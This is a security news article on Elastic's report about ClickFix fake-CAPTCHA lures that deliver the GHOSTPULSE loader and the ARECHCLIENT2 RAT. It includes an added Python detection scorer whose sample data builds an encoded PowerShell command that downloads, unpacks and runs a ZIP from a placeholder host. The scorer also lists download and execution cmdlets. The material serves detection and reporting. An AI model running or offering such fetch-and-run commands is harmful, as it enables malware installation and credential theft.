Elastic Security Labs has revealed a highly sophisticated multi-stage attack chain exploiting a social engineering method dubbed ClickFix. This campaign leads to the deployment of the advanced GHOSTPULSE loader and the resurgent ARECHCLIENT2 (SectopRAT) malware, marking a concerning evolution in stealthy credential theft and remote access operations.
“ClickFix remains a highly effective and prevalent initial access method,” Elastic reports, warning of its widespread use in phishing attacks throughout 2024 and 2025.
First observed in 2024, ClickFix tricks users into initiating compromise themselves by copying and pasting malicious PowerShell commands into the Windows Run dialog. The user interaction is typically driven by a fake CAPTCHA or system error page that prompts the victim to execute a supposed “fix.”
“ClickFix leverages human psychology, transforming seemingly innocuous user interactions into the very launchpad for compromise,” Elastic explains.

Elastic’s telemetry shows a surge in ClickFix-related alerts, particularly during Q1 2025, with a clear rise in mass deployment of Remote Access Trojans (RATs) and InfoStealers.
Elastic observed a live campaign that begins with a phishing site disguised as a Cloudflare CAPTCHA. Behind the scenes, heavily obfuscated JavaScript copies a base64-encoded PowerShell command to the user’s clipboard, which when pasted and executed:
- Downloads a malicious ZIP file containing:
  - A legitimate executable
  - A malicious DLL
  - Encrypted payloads
- Uses DLL sideloading to launch the GHOSTPULSE loader
- Decrypts and injects the final payload: ARECHCLIENT2, a stealthy .NET remote access trojan
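Detection logic for the paste-and-execute stage of this chain, as an added example that is not from Elastic's report or the article: a small Python scorer over constructed process-creation events (hypothetical fields `image`, `parent`, `cmdline`) that decodes a `-EncodedCommand` argument and alerts only when the explorer.exe-to-hidden-PowerShell context coincides with download-and-unpack behaviour. The sample URL and file names are placeholders.

```python
import base64
import re
# Indicator groups for the (decoded) command line, mirroring the chain described above:
# a hidden, encoded PowerShell command pasted into the Run dialog that fetches and unpacks a ZIP.
CHECKS = {
    "downloads content": ("invoke-webrequest", "iwr ", "downloadfile", "downloadstring", "curl "),
    "handles a ZIP archive": ("expand-archive", ".zip"),
    "launches a payload": ("start-process", "invoke-expression", "iex ", "rundll32"),
}

def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or ''."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def analyze(event):
    """Score one process-creation event (hypothetical fields: image, parent, cmdline)."""
    image, parent = event.get("image", "").lower(), event.get("parent", "").lower()
    cmdline = event.get("cmdline", "")
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return False, [], ""
    decoded = decode_encoded_command(cmdline)
    text = (decoded or cmdline).lower()
    reasons = [label for label, hit in (
        ("spawned by explorer.exe", parent.endswith("explorer.exe")),  # Run dialog parent
        ("encoded command", bool(decoded)),
        ("hidden window", bool(re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I))),
    ) if hit]
    reasons += [label for label, tokens in CHECKS.items() if any(t in text for t in tokens)]
    # Alert on the paste context plus fetch-and-run behaviour together, never on one signal alone.
    suspicious = {"spawned by explorer.exe", "downloads content"} <= set(reasons) and len(reasons) >= 4
    return suspicious, reasons, decoded

def sample_events():
    """Constructed events: a routine admin command and a ClickFix-style paste (placeholder URL)."""
    staged = ("Invoke-WebRequest 'http://example.invalid/update.zip' -OutFile $env:TEMP\\fix.zip; "
              "Expand-Archive $env:TEMP\\fix.zip $env:TEMP\\fix; Start-Process $env:TEMP\\fix\\app.exe")
    enc = base64.b64encode(staged.encode("utf-16-le")).decode()
    ps = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    return [
        {"name": "admin", "image": ps, "parent": "C:\\Windows\\System32\\cmd.exe",
         "cmdline": "powershell.exe Get-Process"},
        {"name": "clickfix", "image": ps, "parent": "C:\\Windows\\explorer.exe",
         "cmdline": f"powershell.exe -w hidden -ep bypass -enc {enc}"},
    ]
```

In production the same scorer would read Sysmon Event ID 1 or EDR process telemetry instead of the constructed events, and the token lists should be tuned against your own baseline of legitimate encoded-command use.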
“This particular attack chain demonstrates how adversaries combine social engineering with hidden loader capabilities and multiple execution layers,” the report states.
GHOSTPULSE has been under continuous development since its emergence in 2023. In this campaign, it uses encrypted files like Shonomteak.bxi to extract its stage-two payloads, obfuscate configuration data, and evade detection via memory injection.
One innovation seen here is its use of IDAT headers in PNG images to hide encrypted code—showing how GHOSTPULSE evolves faster than traditional static detection methods.
“The malware decrypts the file using a DWORD addition operation… and injects it into a loaded library using the LibraryLoadA function.”
ARECHCLIENT2, also known as SectopRAT, is a heavily obfuscated .NET-based RAT and stealer. First documented in 2019, its resurgence is notable. The malware targets cryptocurrency wallets, browser data, autofill information, VPN credentials, messaging apps, and even gaming platforms like Steam.
Its deployment flow includes:
- AMSI bypass via API hooking
- Reflective .NET payload loading
- Decryption using embedded XOR routines
ARECHCLIENT2 connects to its command-and-control servers, executes remote commands, and exfiltrates credentials and system data.
Elastic’s analysis found hardcoded C2 infrastructure and evidence of dynamic server rotation, reverse proxies, and high turnover in infrastructure—signs of a well-maintained, actively managed botnet.
One fascinating angle in Elastic’s report is how attackers hijacked legitimate advertising infrastructure to host malicious payloads. Two domains, clients.dealeronlinemarketing[.]com and clients.contology[.]com, were identified as hosting the CAPTCHA lures.
“We assess that the attacker has likely compromised the server 50.57.243[.]90… exploiting the company’s infrastructure and advertising reach to facilitate widespread malicious activity.”